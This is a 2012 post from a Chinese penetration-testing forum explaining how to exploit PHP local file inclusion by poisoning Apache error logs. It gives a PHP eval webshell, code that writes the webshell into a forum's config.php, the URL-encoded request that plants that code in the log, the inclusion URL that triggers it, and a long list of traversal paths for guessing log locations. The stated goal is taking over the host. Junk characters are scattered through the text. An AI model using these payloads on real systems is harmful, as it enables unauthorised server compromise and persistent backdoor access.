找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 php包含apache日志写马
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2112|回复: 0
打印 上一主题 下一主题

php包含apache日志写马

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 14:27:40 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
因为上面那个很不实际,我在测试中发现日志动不动就是几十兆,那样玩起来也没意思了。下面想的再深入一点也就是我们写入一个很实际的webshell来用,也比上面那种慢的要死好很多。 0 @6 p3 @* i3 j
/ M6 E1 `5 Y* \8 n
比如还是这句一句话木马
8 y5 C/ g. V: E- ]<?eval($_POST[cmd]);?>   4 D0 g  h, t4 L1 c4 a' A" _

( T: }% Y0 \( k! p到这里你也许就想到了,这是个很不错的办法。接着看,如何写入就成了个问题,用这句, 4 f) I7 U/ i) j4 M% I
fopen打开/home/virtual/www.xxx.com/forum/config.php这个文件,然后写入<?eval($_POST[cmd]);?>这个一句话木马服务端语句。连起来表达成php语句就是 ! _! _2 f9 ?. D2 I4 f
4 @4 X7 {- D0 d2 O' ]" ^/ j
<?$fp=fopen("/home/virtual/www.xxx.com/forum/config.php","w+");fputs($fp,"<?eval($_POST[cmd]);?>");
' u0 |  \7 `& pfclose($fp);?>   //在config.php里写入一句木马语句
8 n: G, m5 t; I: w5 h* T% i2 C, C  Z$ n
我们提交这句,再让Apache记录到错误日志里,再包含就成功写入shell,记得一定要转换成URL格式才成功。
7 q. {. X. s8 O' n9 y转换为
: }+ D" G- i" Q* o5 S4 F%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww%2Exxx%2Ecom%2Fforum%2F 8 i. h4 q: [- l2 r# ^; f
config%2Ephp%22%2C%22w%2B%22%29%3Bfputs%28%24fp 3 |% |+ g) _+ Q
%2C%22%3C%3Feval%28%24%5FPOST%5Bcmd%5D%29%3B%3F%3E%22%29%3B
) a/ X$ I8 H4 I! u* ?( mfclose%28%24fp%29%3B%3F%3E 0 V* t& U! b& \& @
我们提交
6 |' P5 [# }. d9 [http://xxx.com/%3C%3F%24fp%3Dfopen%28%22%2Fhome%2Fvirtual%2Fwww 7 N3 \8 O7 \. z3 R# d
%2Exxx%2Ecom%2Fforum%2Fconfig%2Ephp
9 _2 m  _  H1 E% V5 C) ]%22%2C%22w%2B%22%29%3Bfputs%28%24fp%2C%22%3C%3Feval%28%24%5FPOST%5B ) w0 Q$ X# f; e1 P
cmd%5D%29%3B%3F%3E%22%29%3Bfclose%28%24fp%29%3B%3F%3E
+ q  D6 m) m+ B9 `- }" \' F/ {( z4 ]
  {( n- D  U9 s& S- \这样就错误日志里就记录下了这行写入webshell的代码。
/ _" `, D$ n7 A4 Q2 e8 V我们再来包含日志,提交 - u+ ?+ S6 H1 `; M! t. b2 e
http://xxx.com/z.php?zizzy=/home ... /logs/www-error_log ; ?4 P# I2 M( H; a# M

' D/ d7 n# E; G" K这样webshell就写入成功了,config.php里就写入一句木马语句
) L# {9 H; ^: WOK. # Y" N( C3 `5 n  u
http://www.xxx.com/forum/config.php这个就成了我们的webshell   c3 \/ }1 L8 ~4 P" ~
直接用lanker的客户端一连,主机就是你的了。 2 v3 o; G' I: E! [

  m. p. z; F6 t/ K- i" @- h" jPS:上面讲的,前提是文件夹权限必须可写 ,一定要-rwxrwxrwx(777)才能继续,这里直接用上面列出的目录来查看。上面讲的都是在知道日志路径的情况下的利用
' g$ N: b  l0 X( q8 s1 A
! o: f$ \; O) @; e) ^8 B$ E其他的日志路径,你可以去猜,也可以参照这里。
" x' q* X) s( U& P4 v2 Q: a! b../../../../../../../../../../var/log/httpd/access_log
; R! d) C6 s$ i/ @, m4 `. Z  L" C( W../../../../../../../../../../var/log/httpd/error_log 5 f; `# e. Z5 w& F( ]! V4 n
../apache/logs/error.log
6 l# S5 S( ^5 _: H0 n+ Q% C  {: H../apache/logs/access.log
+ f, ], c, d4 h* h8 ~../../apache/logs/error.log 5 ~) ?' k' a" I# A8 Y' i! M. c& p1 m
../../apache/logs/access.log
+ H9 C9 v4 U0 M/ R../../../apache/logs/error.log + @% [7 D8 q; p7 a
../../../apache/logs/access.log $ j! L! }9 B8 y$ Y6 Y8 ~+ V
../../../../../../../../../../etc/httpd/logs/acces_log
4 z6 k3 E/ q5 U9 K8 q- t( W../../../../../../../../../../etc/httpd/logs/acces.log
" o6 G: O. f( _! @( N6 l2 P../../../../../../../../../../etc/httpd/logs/error_log
- Z' Y2 J0 k# |( d../../../../../../../../../../etc/httpd/logs/error.log
6 [8 P  ^+ {9 k! E( o../../../../../../../../../../var/www/logs/access_log
7 f0 T% b) [$ X& u4 S7 M../../../../../../../../../../var/www/logs/access.log 3 L$ g0 G- G8 l* l; z; _" q  l/ z
../../../../../../../../../../usr/local/apache/logs/access_log 7 R7 {) b8 x$ Z$ w7 U5 `
../../../../../../../../../../usr/local/apache/logs/access.log
1 P" p; c+ M) w9 O9 r../../../../../../../../../../var/log/apache/access_log
/ V6 g6 o' H6 c: I2 D../../../../../../../../../../var/log/apache/access.log * y+ U9 \( X* Z# a. S  N0 p
../../../../../../../../../../var/log/access_log
3 _& Y7 X2 m: M% k8 u2 b/ Z6 a; {../../../../../../../../../../var/www/logs/error_log
) m( r$ f. u5 C, s8 Z: c1 Q7 t../../../../../../../../../../var/www/logs/error.log 1 \/ ^% z+ h! e: Z
../../../../../../../../../../usr/local/apache/logs/error_log 7 ?0 o9 v8 f" ^& ~
../../../../../../../../../../usr/local/apache/logs/error.log
& o$ p9 ]1 J1 T# K) ^../../../../../../../../../../var/log/apache/error_log ; J6 c2 m5 c5 a# y9 p
../../../../../../../../../../var/log/apache/error.log & e) h0 w: u2 R6 G0 b+ t# I$ ]
../../../../../../../../../../var/log/access_log 8 _# Q( Y2 b" ~9 \5 ~
../../../../../../../../../../var/log/error_log 5 [) O0 A* N, s8 k
/var/log/httpd/access_log       , `; D0 n0 s- _. U- g; m* V% _
/var/log/httpd/error_log     
  W: l/ ~! Q- n; F3 W" n( J../apache/logs/error.log     
/ {, }; N5 _: q1 E. W4 S../apache/logs/access.log
, O  a3 ^/ K' r! ]3 R; D& C../../apache/logs/error.log + q6 m: F3 u" M1 ^: h# K3 _
../../apache/logs/access.log 8 e9 O7 x  `% n! a: ]
../../../apache/logs/error.log . l) A( ?9 h; T! t9 E5 Q
../../../apache/logs/access.log
$ g& p, A4 \9 L9 l4 C/etc/httpd/logs/acces_log 5 a* @6 m: [) a, G3 J, B
/etc/httpd/logs/acces.log
( x) Z9 |! ?/ [/ F- u  N/ r/etc/httpd/logs/error_log
9 K/ L# X  e% A3 d* J/ Z- ^/etc/httpd/logs/error.log 1 p. ^2 x$ w% b" S; n1 M+ j
/var/www/logs/access_log
/ {  I3 O/ T2 {7 G$ z/var/www/logs/access.log / t+ `( }! u% }* I+ h9 |
/usr/local/apache/logs/access_log
" S7 K4 m. v! K. Z" y/usr/local/apache/logs/access.log 4 \) |: \( h) q. O. e
/var/log/apache/access_log
6 X+ N$ b' W; n; c6 j5 `8 y, G1 T9 d/var/log/apache/access.log
9 t: }% d: E: Q- @1 f; N( E/var/log/access_log $ p6 N/ G! @' d, d& J1 G- a
/var/www/logs/error_log - d" m# D5 n  n% c! z
/var/www/logs/error.log . D2 c- T, O' `8 K9 i9 M
/usr/local/apache/logs/error_log
6 e5 [8 g' w. e* ^- T6 J4 c) O/usr/local/apache/logs/error.log + u# p7 Q* }* e, W1 U7 b
/var/log/apache/error_log
0 Z& E8 M: I. o8 V' Q. k3 z/var/log/apache/error.log 1 L; t( @9 \( O, s1 ~4 t+ L5 C* N* X
/var/log/access_log - H; I- K( O5 J; p& \2 s
/var/log/error_log
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表